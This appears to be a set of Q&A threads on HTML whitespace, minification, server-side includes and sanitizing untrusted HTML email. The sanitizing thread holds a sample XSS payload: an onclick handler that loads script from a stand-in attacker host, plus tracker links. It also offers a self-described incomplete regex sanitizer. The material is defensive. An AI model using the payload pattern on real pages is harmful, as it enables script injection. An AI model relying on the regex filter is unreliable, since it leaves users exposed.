I use Hakyll to generate some documentation and I noticed that it has a weird way of closing the HTML tags in the code it generates.
There was a page where they said that you must generate the markup as they do, or the layout of your page will be broken under some conditions, but I can't find it now.
I created a small test page (code below) which has one red layer with the "normal" HTML markup, and a yellow layer with markup similar to what Hakyll generates.
I can't see any difference in Firefox between the two divs.
Can anybody explain if what they say is true?
<html>
<body>
<!-- NORMAL STYLE -->
<div style="background: red">
<p>Make available the code from the library you added to your application. Again, the way to do this varies between languages (from adding import statements in python to adding a jar to the classpath for java)</p>
<p>Create an instance of the client and, in your code, make calls to it through this instance's methods.</p>
</div>
<!-- HAKYLL STYLE -->
<div style="background: yellow"
><p
>Make available the code from the library you added to your application. Again, the way to do this varies between languages (from adding import statements in python to adding a jar to the classpath for java)</p
><p
>Create an instance of the client and, in your code, make calls to it through this instance's methods.</p
></div
>
</body>
</html>
It's actually pandoc that's generating the HTML code. There's a good explanation in the Pandoc issue tracker:
http://code.google.com/p/pandoc/issues/detail?id=134
The reason is
because any whitespace (including newline and tabs) between HTML tags will cause the
browser to insert a space character between those elements. It is far easier on the
machine logic to leave these spaces out, because then you don't need to think about
the possible ways that the HTML text formatting could be messing with the browser adding
extra spaces.
There are times when stripping the white space between two tags will make a difference, particularly when dealing with inline elements.
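To make the point about whitespace concrete, here is a minimal sketch using Python's standard `html.parser` (not a browser, so it only shows what a parser sees, not how a layout engine renders it). The class and function names are made up for this illustration. It counts the whitespace-only text nodes in conventionally formatted markup and in markup where the line breaks sit inside the tags, as in the yellow div of the question.

```python
from html.parser import HTMLParser


class TextNodeCollector(HTMLParser):
    """Collects every text node the parser reports, including whitespace-only ones."""

    def __init__(self):
        super().__init__()
        self.text_nodes = []

    def handle_data(self, data):
        self.text_nodes.append(data)


def whitespace_only_nodes(markup):
    """Return the text nodes that consist of whitespace only."""
    collector = TextNodeCollector()
    collector.feed(markup)
    collector.close()
    return [text for text in collector.text_nodes if text.strip() == ""]


# Line breaks between tags: each one becomes a text node.
normal_style = "<div>\n<p>one</p>\n<p>two</p>\n</div>"
# Line breaks inside the tags: no text exists between the elements.
pandoc_style = "<div\n><p\n>one</p\n><p\n>two</p\n></div\n>"

print(len(whitespace_only_nodes(normal_style)))
print(len(whitespace_only_nodes(pandoc_style)))
```

Between block elements such as div and p these extra text nodes normally have no visible effect, which would explain why the two divs in the test page look the same. Between inline elements they can render as a space.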
I ran tidy over it and it fixed the unusual linebreaks.
I have an unusual situation. I am in a transitional state for a website that will eventually be a wiki-like site that uses markdown files to generate documentation. However, for our phase 0 demonstration to upper management, I need to use HTML instead of markdown for advanced layouts. This leads to large portions of the Markdown files being HTML. Generally speaking, this is working fine, but sometimes the "4 spaces means code block" "feature" of markdown means that instead of rendering the page, I just get the HTML pasted to the screen in a <pre>.
So, my question is, how can I turn off the "4 spaces means code block" thing? IMO, this is an idiotic design in the first place, but it's really screwing with my current project!
For example:
I have a banner
<div class="banner detail">
<div class="banner-inner">
...
</div>
</div>
On some pages, this renders exactly as expected. On others, it spits out the "banner-inner" div and everything inside it to the page. Hell, even convincing this editor to display that code snippet instead of processing it took 5 minutes of trial and error poking...
Please, someone help me turn off or get around (without simply not using indenting...) this "feature"!!
Sadly, whether this "feature" can be turned off is relegated to a customization question for the specific software package in use.
On the bright side, I was eventually able to determine that the specific problem I was having was caused by the engine interpreting invalid HTML code (i.e., missing a closing tag) as code to be displayed rather than processed. So in the end, seeing this happen actually tended to mean that I had a bug to fix.
I have a handlebars template file that I'd like to minify. I found a couple questions that were related to my issue on StackOverflow, but nothing exactly like it that had an answer. My issue is that spaces that are within the templated values are getting removed when I run the code through a minifier.
Example:
I have this line of code in my template file:
<div>{{{displayName}}} - {{cost}}</div>
When I use the un-minified file to render the page, I get entries like:
ProductName - $5.50
which is what I want. After running the template through an html minifier, my template line now looks like this:
<div>{{{displayName}}}-{{cost}}</div>
and the entries on the rendered page look like:
ProductName-$5.50
Not optimal. Now, I understand that I could just run through the template and put in non-breaking spaces into all the places where I'd like spaces to be. Nice. Simple. Easy... relatively.
But.
A secondary, and larger, issue comes into play (and what's the point of going through and putting in all those non-breaking spaces into my template file to avoid this situation with the html minifier if there are more issues) when I'm selectively adding attributes or classes to a given html element.
Example:
I also have lines in my template files that look like:
<div class="paymentMethod{{#if paymentSelected}} active{{/if}}">
On the condition where my template (Handlebars) variable "paymentSelected" is true, the HTML shows as:
<div class="paymentMethod active">
After minification, however, the minified template file contains:
<div class="paymentMethod{{#if paymentSelected}}active{{/if}}">
which makes the HTML on the page show as:
<div class="paymentMethodactive">
which, consequently, messes up all of my CSS and JavaScript because there is now one unrecognized class on the element instead of two correct classes.
Again, there is a way of getting around this. I could just place all of the class definitions into the template variables. So, my new template would be:
<div class="{{#if paymentSelected}}paymentMethod active{{else}}paymentMethod{{/if}}">
This kind of goes against the idea of removing redundancy though. So I don't like it. And this is a fairly simple case, with only two possible classes.
I'm sure there are more possibilities for hassle with html minification of template files, but I think I've shown my point.
Now, all of that explanation comes to my question:
Is there a tool out there that will minify html but ignore spaces that are between opening and closing template tags? For me, those spaces are similar to the spaces between words. I don't want all the spaces between the words of a sentence removed any more than I want the spaces within my template tags to be removed.
I also went searching for a generic sed solution, but didn't find anything in that direction either.
Could you just use &nbsp;?
<div class="paymentMethod{{#if paymentSelected}} active{{/if}}">
Okay, so I figured out a better option, and this may be incredibly obvious to some but I'm pretty new to the whole Handlebars gig.
A better solution to minifying the html templates would be to precompile the templates and to then minify the resulting javascript. This way, I also get the savings of no compilation time on the browser side and (because I'm using Handlebars as my templating language) loading the smaller runtime script.
Granted, this solution doesn't explicitly answer the question I posed, but it does solve the ultimate problem I'm trying to solve, which is to minimize the page-load time on a browser by doing everything I can to the necessary assets prior to a browser downloading them.
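For the narrower question that was originally asked, one possible approach is to strip whitespace only where it sits directly between a closing `>` and the next `<`, and leave everything else alone. The sketch below is a hypothetical helper, not an existing tool; `strip_between_tags` is a name invented here. It assumes the template contains no `<pre>`, `<textarea>`, or inline scripts where such whitespace matters.

```python
import re

# Whitespace that sits directly between the end of one tag and the start of the next.
BETWEEN_TAGS = re.compile(r">\s+<")


def strip_between_tags(template):
    """Remove whitespace between adjacent tags; text and {{...}} expressions are untouched."""
    return BETWEEN_TAGS.sub("><", template)


template = (
    "<ul>\n"
    '  <li class="paymentMethod{{#if paymentSelected}} active{{/if}}">'
    "{{{displayName}}} - {{cost}}</li>\n"
    "</ul>"
)
print(strip_between_tags(template))
```

The spaces inside the class attribute and around the hyphen survive because they are not bounded by `>` on one side and `<` on the other. The same rule would still change rendering if two inline elements were separated only by whitespace, so it is a starting point rather than a general minifier.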
To take away some page loading time, where can I find something to remove spaces between HTML tags, without me having to go through each one and remove them myself?
Like so:
<body>
<p>Lots of space</p>
</body>
<body><p>No space</p></body>
I found this site. But it leaves one space between tags. But I don't want any.
Be careful that you have some idea of what is happening or you will corrupt the integrity of your documents. A fully minified code sample removes all comments and all white space characters not necessary for syntactical purposes.
In other words this example of HTML:
<p>Some content
<strong>is strong</strong>
and
<em>emphasized</em>
in this paragraph.</p>
When fully minified becomes:
<p>Somecontent<strong>isstrong</strong>and<em>emphasized</em>inthisparagraph.</p>
In that case the corruption to the content is obvious, as all the words are colliding into each other. What is less obvious is the white space separating content from tags, and the white space between tags that are not adjacent to other content. All white space characters outside of tags in an HTML document are text nodes in the DOM, and removing DOM nodes without careful consideration is possibly harmful.
Furthermore, you also have to ensure that your HTML minifier is not corrupting any inline JavaScript or CSS code. Investigate these conditions carefully when looking at the different options available.
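As a rough illustration of the safer alternative to removing all white space, the sketch below collapses each run of white space into a single space instead of deleting it, using the paragraph from the example above. `collapse_whitespace` is a name made up for this sketch, and the function is deliberately naive: it assumes the markup contains no `<pre>`, `<textarea>`, inline JavaScript, or CSS, all of which would need to be skipped.

```python
import re


def collapse_whitespace(markup):
    """Replace every run of whitespace with one space so that words never collide."""
    return re.sub(r"\s+", " ", markup).strip()


sample = (
    "<p>Some content\n"
    "<strong>is strong</strong>\n"
    "and\n"
    "<em>emphasized</em>\n"
    "in this paragraph.</p>"
)
print(collapse_whitespace(sample))
```

The output keeps exactly one space wherever the source had a line break, so the words stay separated and the inline elements keep their spacing.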
Here is one that I wrote which may be helpful to you as it minifies markup tags in a way that is fully recursive to a beautified state using an automated pretty-print application.
http://prettydiff.com/?m=minify&html
Any other HTML minifier without this rule will work.
Google listed me this one:
http://www.willpeavy.com/minifier/
I'm developing a web application with the Smarty template engine. It has a {strip} function, which strips new lines, tabs, spaces... from the template. So you can write your code with as many new lines and spaces as you like, but the output will be on a single line.
I have finally perfected my web page and it works perfectly in every browser.
However, when I abstracted out the header and footer contents into server side includes, the layout changed marginally in Firefox/Opera/Safari, but in IE, the layout change makes the page look broken.
Are there any known issues that could cause the layout to change when using SSIs? Quite frankly, I'm surprised that using a SSI would have an effect like this. I am using HTML5 tags, the modernizr js library, and the page validates if any of that matters.
EDIT: I fixed my problem by changing what code was abstracted (I simply abstracted one parent tag further than before). HOWEVER, I am still eager to know exactly why this bug happened in the first place. Is there someone out there who could shed light on what in particular could cause this?
Chances are that it's not SSI that's causing any issues.
It's entirely possible that there are newlines in the HTML code causing IE to insert extraneous spaces, causing the layout to break.
Also, be sure you separated the code correctly when you moved pieces to the includes. It is probably easiest to check this by running your HTML through a validator.
I was having a similar problem and fixed as follows.
I had something like this:
<div>
<include>
</div>
and fixed it by changing it to this:
<div><include></div>
The issue ended up being a bug with how the server parsed the HTML and with HTML5 tags. For whatever reason, when I added one extra tag set to the SSI, it worked.
My original include looked like this:
<header>
<!--#Include File="/includes/header.shtm"-->
</header>
with the included file being:
<nav>
<ul>
<li>Home</li>
<li>Products</li>
<li>About</li>
<li>Contact</li>
</ul>
</nav>
But when I took all of the HTML5 tags out of the include, as shown below, everything worked as normal. I'm not sure if this is an issue with an old version of Apache or what, but doing this fixed everything.
<header>
<nav>
<!--#Include File="/includes/header.shtm"-->
</nav>
</header>
It may be a file encoding problem with UTF-8, inserting BOM characters at the beginning of the included file. My solution was to save the include file as UTF-8 without the BOM signature.
I noticed having the include statement just after the body tag showed the extra space, but adding (any?) html tag around the include statement hides it. I'm guessing the browser ignores the characters once they're "inside" the body instead of the beginning.
My particular situation involved Visual Studio, but it shows up with a mix of editors. See also
How can I avoid the blank space when using PHP include?
Force Visual Studio (2010) to save all files in UTF-8
UTF-8 without BOM
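If you would rather check for the BOM programmatically than rely on editor settings, a minimal sketch in Python could look like this. `strip_utf8_bom` is a name invented for the illustration; `codecs.BOM_UTF8` is the standard library constant for the three bytes EF BB BF.

```python
import codecs


def strip_utf8_bom(data: bytes) -> bytes:
    """Return the bytes without a leading UTF-8 byte order mark, if one is present."""
    if data.startswith(codecs.BOM_UTF8):
        return data[len(codecs.BOM_UTF8):]
    return data


with_bom = codecs.BOM_UTF8 + b"<nav>...</nav>"
print(strip_utf8_bom(with_bom))
```

When reading an include file as text instead of bytes, opening it with `encoding="utf-8-sig"` has the same effect, since that codec drops a leading BOM while decoding.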
This is a common problem, I'm hoping it's been thoroughly solved for me.
In a system I'm doing for a client, we want to accept HTML from untrusted sources (HTML-formatted email and also HTML files), sanitize it so it doesn't have any scripting, links to external resources, and other security/etc. issues; and then display it safely while not losing the basic formatting. E.g., much as an email client would do with HTML-formatted email, but ideally without repeating the 347,821 mistakes that have been made (so far) in that arena. :-)
The goal is to end up with something we'd feel comfortable displaying to internal users via an iframe in our own web interface, or via the WebBrowser class in a .Net Windows Forms app (which seems to be no safer, possibly less so), etc. Example below.
We recognize that some of this may well muck up the display of the text; that's okay.
We'll be sanitizing the HTML on receipt and storing the sanitized version (don't worry about the storage part — SQL injection and the like — we've got that bit covered).
The software will need to run on Windows Server. COM DLL or .Net assembly preferred. FOSS markedly preferred, but not a deal-breaker.
What I've found so far:
The AntiSamy.Net project (but it appears to no longer be under active development, being over a year behind the main — and active — AntiSamy Java project).
Some code from our very own Jeff Atwood, circa three years ago (gee, I wonder what he was doing...).
The HTML Agility Pack (used by the AntiSamy.Net project above), which would give me a robust parser; then I could implement my own logic for walking through the resulting DOM and filtering out anything I didn't whitelist. The agility pack looks really great, but I'd be relying on my own whitelist rather than reusing a wheel that someone's already invented, so that's a ding against it.
The Microsoft Anti-XSS library
What would you recommend for this task? One of the above? Something else?
For example, we want to remove things like:
script elements
link, img, and such elements that reach out to external resources (probably replace img with the text "[image removed]" or some such)
embed, object, applet, audio, video, and other tags that try to create objects
onclick and similar DOM0 event handler script code
hrefs on a elements that trigger code (even links we think are okay we may well turn into plaintext that users have to intentionally copy and paste into a browser).
__________ (the 722 things I haven't thought of that are the reason I'm looking to leverage something that already exists)
So for instance, this HTML:
<!DOCTYPE html>
<html>
<head>
<title>Example</title>
<link rel="stylesheet" type="text/css" href="http://evil.example.com/tracker.css">
</head>
<body>
<p onclick="(function() { var s = document.createElement('script'); s.src = 'http://evil.example.com/scriptattack.js'; document.body.appendChild(s); })();">
<strong>Hi there!</strong> Here's my nefarious tracker image:
<img src='http://evil.example.com/xparent.gif'>
</p>
</body>
</html>
would become
<!DOCTYPE html>
<html>
<head>
<title>Example</title>
</head>
<body>
<p>
<strong>Hi there!</strong> Here's my nefarious tracker image:
[image removed]
</p>
</body>
</html>
(Note we removed the link and the onclick entirely, and replaced the img with a placeholder. This is just a small subset of what we figure we'll need to strip out.)
This is an older, but still relevant question.
We are using the HtmlSanitizer .Net library, which:
is open-source
is actively maintained
doesn't have the problems of the Microsoft Anti-XSS library
is unit tested with the OWASP XSS Filter Evasion Cheat Sheet
is specially built for this (in contrast to HTML Agility Pack, which is a parser)
is also available on NuGet
I sense you would definitely need a parser that can generate an XML/DOM source so that you can apply a filter to it to produce what you are looking for.
See if the HtmlTidy, Mozilla, or HtmlCleaner parsers can help. HtmlCleaner has a lot of configurable options which you might also want to look at, specifically the transform section, which allows you to skip the tags you don't require.
I would suggest using another approach. If you control the method by which the HTML is viewed, I would remove all threats by using an HTML renderer that doesn't have an ECMAScript engine or any XSS capability. I see you are going to use the built-in WebBrowser object, and rightly so, you want to produce HTML that cannot be used to attack your users.
I recommend looking for a basic HTML display engine. One that cannot parse or understand any of the scripting functionality that would make you vulnerable. All the javascript would just be ignored then.
This does have another problem though. You would need to ensure that the viewer you are using isn't susceptible to other types of attacks.
I suggest looking at http://htmlpurifier.org/. Their library is pretty complete.
Interesting problem. I spent some time on it because there are a lot of things we want to remove from user input, and even if I write a long list of things to be removed, HTML can evolve later on and my list would have holes.
Nonetheless, I want users to be able to input some simple things like bold, italic, paragraphs... pretty simple.
The list of allowed things is no doubt shorter, and if HTML changes later on, that won't make holes in my list unless HTML stops supporting these simple things.
So start thinking the other way around and state only what you allow. With great pain, because I'm not an expert on regex (so please, regex people, correct or improve this), I coded this expression, and it has been working for me since before HTML5 arrived.
replace(/(?!<[/]?(b|i|p|br)(\s[^<]*>|[/]>|>))<[^>]*>/gi,"")
(b|i|p|br) <- this is the list of allowed tags; feel free to add some.
This is a starting point, which is why regex people should improve it to also remove attributes such as onclick.
If I do this:
(?!<[/]?(b|i|p|br)(\s*>|[/]>|>))<[^>]*>
tags with onclick or other attributes will be removed, but the corresponding closing tags will remain. And after all, we don't want those tags removed; we just want to remove their attributes.
Maybe a second regex pass with
(?!<[^<>\s]+)\s[^</>]+(?=[/>])
Am I right? Can this be composed into a single pass?
We still have no relation between opening and closing tags, but that is no great problem so far.
Can the attribute removal be written to remove everything that is not on a whitelist? (Possibly yes.)
A last problem: when removing tags like script, the content remains. That is desirable when removing font but not script. We can do a first pass with
<(script|object|embed)[^>]*>.*</\1>
that will remove certain tags and their content, but it's a blacklist, meaning you have to keep an eye on it in case HTML changes.
Note: all with the "gi" flags.
Edit:
I joined all of the above into this function:
String.prototype.sanitizeHTML = function (white, black) {
  if (!white) white = "b|i|p|br"; // allowed tags
  if (!black) black = "script|object|embed"; // tags removed together with their content
  // [\s\S]*? instead of .* so the match spans newlines and stops at the first closing tag
  var e = new RegExp("(<(" + black + ")[^>]*>[\\s\\S]*?</\\2>|(?!<[/]?(" + white + ")(\\s[^<]*>|[/]>|>))<[^<>]*>|(?!<[^<>\\s]+)\\s[^</>]+(?=[/>]))", "gi");
  return this.replace(e, "");
};
- black list -> the tag and its content are removed completely
- white list -> the tags are retained
Other tags are removed, but their content is retained.
All attributes of the white-listed tags (the remaining ones) are removed.
There is still room for a white list of attributes (not implemented above), because if I want to preserve IMG then the src must stay... and what about tracking images?
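For comparison, the same three rules (keep allowed tags without attributes, drop some tags together with their content, unwrap everything else) can be sketched with a real parser instead of a regex. The version below uses Python's standard `html.parser`. The class name, function name, and default lists are assumptions carried over from the regex above. It is an illustration of the allow-list idea only and not a replacement for a vetted sanitizer such as the libraries recommended in the other answers.

```python
from html import escape
from html.parser import HTMLParser


class AllowListSanitizer(HTMLParser):
    """Keeps allowed tags (without attributes), drops some tags with their content."""

    def __init__(self, allowed=("b", "i", "p", "br"),
                 dropped=("script", "object", "embed")):
        super().__init__(convert_charrefs=True)
        self.allowed = set(allowed)
        self.dropped = set(dropped)
        self.out = []
        self.drop_depth = 0  # greater than 0 while inside a dropped element

    def handle_starttag(self, tag, attrs):
        if tag in self.dropped:
            self.drop_depth += 1
        elif self.drop_depth == 0 and tag in self.allowed:
            self.out.append("<%s>" % tag)  # all attributes are discarded

    def handle_endtag(self, tag):
        if tag in self.dropped:
            if self.drop_depth > 0:
                self.drop_depth -= 1
        elif self.drop_depth == 0 and tag in self.allowed and tag != "br":
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        # Text is re-escaped so it can never be read back as markup.
        if self.drop_depth == 0:
            self.out.append(escape(data, quote=False))


def sanitize_html(markup):
    parser = AllowListSanitizer()
    parser.feed(markup)
    parser.close()
    return "".join(parser.out)


dirty = ('<p onclick="evil()">Hi <b>there</b>'
         '<script>alert(1)</script><font color="red">!</font></p>')
print(sanitize_html(dirty))
```

One design choice worth noting: an unclosed dropped tag such as a stray `<object>` suppresses everything after it, so the sketch fails closed rather than open. An attribute allow-list, for example to keep `src` on images, would go in `handle_starttag`.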